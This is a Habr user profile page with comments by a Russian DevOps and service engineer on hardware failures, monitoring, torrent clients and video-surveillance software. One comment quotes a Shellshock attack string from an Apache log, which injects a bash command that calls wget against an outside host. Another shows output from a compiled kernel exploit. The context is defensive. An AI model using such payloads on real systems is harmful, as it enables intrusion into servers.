Pull to refresh
4
0
Александр @timerbulatov

Руководитель ИТ-проектов, DevOps — инженер

Send message
Я правильно понимаю, что с верхнего процессора нагретый воздух затягивает в один из блоков питания?
Ни разу не считаю себя специалистом в аэродинамике, но вот у упомянутых в статье серверах HP воздух с процессоров выбрасывается мимо блоков питания(по крайней мере в тех серверах, что я видел).
Также есть замечательный плагин для связи Zabbix и Grafana — grafana-zabbix, который позволяет реализовать дополнительные дашборды, алерты и прочее, комбинация классического интерфейса Zabbix и Grafana помогает, когда надо наблюдать много параметров(вроде как в классическом интерфейсе Zabbix еще нет возможности на один график наложить несколько метрик сразу от нескольких узлов?) и в том числе визуализировать проблемы производительности какой либо системы.
Это если говорить про плюсы…
Про минусы — до сих пор нельзя сделать нормальную выгрузку событий, которые не умещаются на одной странице… экспортируется в CSV стабильно первая страница. Приходится извращаться с API и прямой выгрузкой из базы.
Тоже экспериментировал с системой в памяти — создавал виртуалку, жесткий диск которой полностью был в памяти — потрясно быстро работает… но столкнулся с проблемой сохранения изменений после обновления например — каждый раз экспортировать напрягало…
Кроме того — не совсем согласен с неубиваемостью — если выключат электричество или система наглухо зависнет — все изменения пропадут же?
В компании, где работаю тоже были закуплены эти диски — 5 из 12 уже посыпались и тоже разбирал их — удивил жуткий запил по всей поверхности блинов, и что характерно — сдохли с разницей в + — две недели после схода с гарантии… но сильных следов пыли не нашли внутри, когда разбирали на магнитики для держателей инструмента… показалось что проблема в непонятном износе поверхности головок… в одном из винчестеров головки просто оторвало и разметало по гермобоксу.
Спасибо за информацию по пыли, остальные винты проверим — но думаю они тоже приговорены…
На IXBT нашел статью про этот мейнфрейм — сказано что поддерживает Linux и OpenStack… а работает под управлением z/OS.
возможно, но повторять такие элементарные ошибка раз за разом -очень накладно для производителя, потому что некоторая часть аппаратов не доживают до конца гарантии, а некоторые в гарантийном ремонте бывают по несколько раз — а значит производитель несет убытки…
на одной из конференций сервисных инженеров из зала звучали призывы направлять проектировщиков аппаратуры на стажировку в сервисный центр… но похоже эта идея не была признана годной у руководства того производителя.
Как сервисный инженер со стажем выскажу своё ИМХО по поводу качества разводки автороутерами — не важно что это за продукт… неважно, какой сложности плата проектируется — чтобы эта плата была качественно разведена и правильно расставлены элемены на этой плате — нужно ввести в автороутер массу правил и ограничений, провести аудит по нагреву разных участков схемы в привязке к расположению элементов, провести аудит на вероятность возникновения перекрестных помех и наводок… да море всего еще, что пока не умеет делать программа, но умеет делать опытный специалист с карандашом и бумажкой… а роутеры(и автороутеры) — только дополнение к этому специалисту…

Приведу пример — в огромном числе мониторов встречался с ошибкой проектирования платы блока питания, которая заключается в неправильной расстановке электролитов во вторичной цепи и близко от радиаторов, на которых смонтированы диоды… и проблема не в близости а в относительной ориентации теплоотвода и электролитов — внизу теплоотвод, над ним электролиты… из за этого электролиты еще быстрее теряют емкость и аппарат выходит из строя не дожив до окончания гарантии или сразу после ее окончания…
А можно ли обойти самое главное ограничение — чтоб облако перед всеми операциями по введению регистрации не запускалось? Переставить уже нет возможности…
Скорее всего на домене организовали сканер уязвимости по списку… последний запрос с этого IP был полтора часа назад — посканировали и свернулись быстренько.

Пробовал подставить в строку из лога ссылку на скачивание на локалхосте — ничего не скачалось, да и обновился уже на всех подконтрольных серверах…
Порылся в логах Апача на домашнем сервере — тоже нашел следы атак:

IP — 5.9.54.227 — - "-" "() { :;}; /bin/bash -c \«wget -O /dev/null tools.vsibiri.info/are_you_vuln/10*******.RU\»"

Посмотрел информацию по домену vsibiri.info — зарегистрирован достаточно давно — и сейчас уже ничего не отдает — взломали и с него дальше пытаются ломать?
Спасибо за статью.Тоже долгое время пользуюсь rtorrent-ом, знакомство с ним началось с его установки на роутере ASUS WL-500gP с 32 мегабайтами оперативки.
Перепробовал все доступные torrent-клиенты под Linux, но так и остался на rtorrent+rutorrent из за его стабильности и нетребовательности к ресурсам.
Вдогонку добавлю свои пять копеек… Существуют такие устройства, как бытовые видеорекордеры с встроенным жестким диском и пишущим DVD-приводом. Когда работал в сервисном центре, приходили люди, которые хранили видео- или фото-архив на жестком диске такого агрегата… и частенько бывало так, что при записи очередной порции данных с карты памяти фотика или DVD-болванки моргал свет или рекордер тупо зависал.
Приходилось разбираться — жесткий диск переставлялся в компьютер и снимался образ — а далее анализ файловой системы — например у Sony была кастрированная(непонятно зачем) файловая система FAT32.После анализа и сравнения с оригинальной FAT32 и приведением к стандарту удавалось обработать образ testdisk-ом.
В более клинческих случаях файловая система при перебое питания недополучала порцию данных из буфера устройства.Тогда ничего кроме HEX-редактора не помогало.
Для рекордеров Samsung даже приходилось писать простенький экспортер архива, так как по непонятным причинам, внезапно жесткий диск переставал проходить проверки на валидность внутри рекордера и предлагал решить проблему форматированием))).
Только только втянулся в повествование, как оно резко оборвалось… продолжение будет?
Виртуалка на Core-i7-2600 4 ядра.
Linux web 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:30:00 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

При запуске скомпилированного эксплоита выводится
child RIP = 0x7f8ed9487e65
child RIP = 0x1000000000000
и дальше работает… не так скомпилил или не работает?
Скриншот 1
Скриншот 2

Под мультисерверной конфигурацией подразумевается следующее:
Есть некоторое количество камер, территориально сгрупиррованных в несколько групп.Каждая из групп подключается к своему серверу.Каждый из серверов знает о другом сервере, и на каждом из серверов можно посмотреть архив другого сервера.При этом для клиента все эти сервера выглядят как единый сервер.Как то так.
Коли так — вот еще вопрос — планируете ли вы в обозримом будущем открыть исходники? Плюсы от такого шага тоже будут.
Сейчас не поленился, залез в настройки и посмотрел — отключено.Скриншот я делал с системы WinXP 32 бита с 1 Гигом оперативки.Могу еще скриншотов наделать… и настройки камеры и настройки аналитики, которая отключена.
И еще — я не хочу с вами спорить на предмет, плохой ваш софт или хороший — он хороший( и бесплатный и кроссплатформенный и т.д и т.п.)Просто у каждого программного продукта есть свои особенности и недостатки.Вы их знаете намного лучше меня.Я же просто предоставил некоторые факты и часть своего опыта по общению с вашим программным продуктов.
Из пожеланий — сделайте 64битную версию для Linux, которая не будет тянуть 32-х битные компоненты.(может уже сделали? я с полгода не проверял)
Мультисерверная конфигурация у вас есть? чтоб дублировать или распределять нагрузку.
Работа с архивом тоже требует от компа напряжения всех его кремниевых сил — было пару раз что даже камеры(4 штуки) отваливались при просмотре архива на клиенте.
Вот только что снятый скриншот с машины с 1 Гб RAM WinXP, которая больше ничем не занимается, кроме постоянной записи с одной камеры — ТЫЦ
Никакой аналитики, только запись на постоянной основе.К учетной записи в облаке не был авторизован, насколько помню.Причем, даже если отключить запись вообще — нагрузка падала на 15 процентов, не больше.
Вот что не пробовал — вместо IP-камер подключить аналогичное количество web-камер и посмотреть нагрузку на систему.
Некоторое время назад озадачился поиском бесплатной системы видеонаблюдения на 4-12 каналов IP.
Была в том числе оттестирована система Ivideon… вот основные моменты, из за которых вычеркул ее из списка претендентов:
1.Большая нагрузка на систему — больше 65% CPU при постоянной записи с 4-х IP камер Arecont Vision(2-х мегапиксельные как mjpeg так и h264).про 12 каналов даже и говорить не стоит.(Windows 7 32/64 разрядная, Xubuntu 13.04 32bit)
2. На систему XUbuntu 14.04 x64 поставить не удалось по причине неудовлетворенных зависимостей 32-х битных библиотек.
3. При просмотре даже 4-х камер несколькими клиентами опять же дикие тормоза на сервере под 100% CPU(при условии что сеть на сервере и клиенте гигабитная)
4.На момент тестирования не удалось запустить Ivideon Server на Linux-сервере без графического окружения потому что приведенная на сайте инструкция не была актуальна(пути к конфигам и пр.)

В остальном — годная программа для записи с web-камеры(камер) в небольшом разрешении с кросплатформенным сервером и клиентом, что не часто встретишь у конкурентов.
Опять же сопутствующие услуги и товары — нормальная модель монетизации сервиса.
1

Information

Rating
Does not participate
Location
Тольятти, Самарская обл., Россия
Date of birth
Registered
Activity

Specialization

System Administration, DevOps
Lead
From 200,000 ₽
Project management
Building a team
Development of tech specifications
IT service management
People management
Development management
Automation of processes
Organization of business processes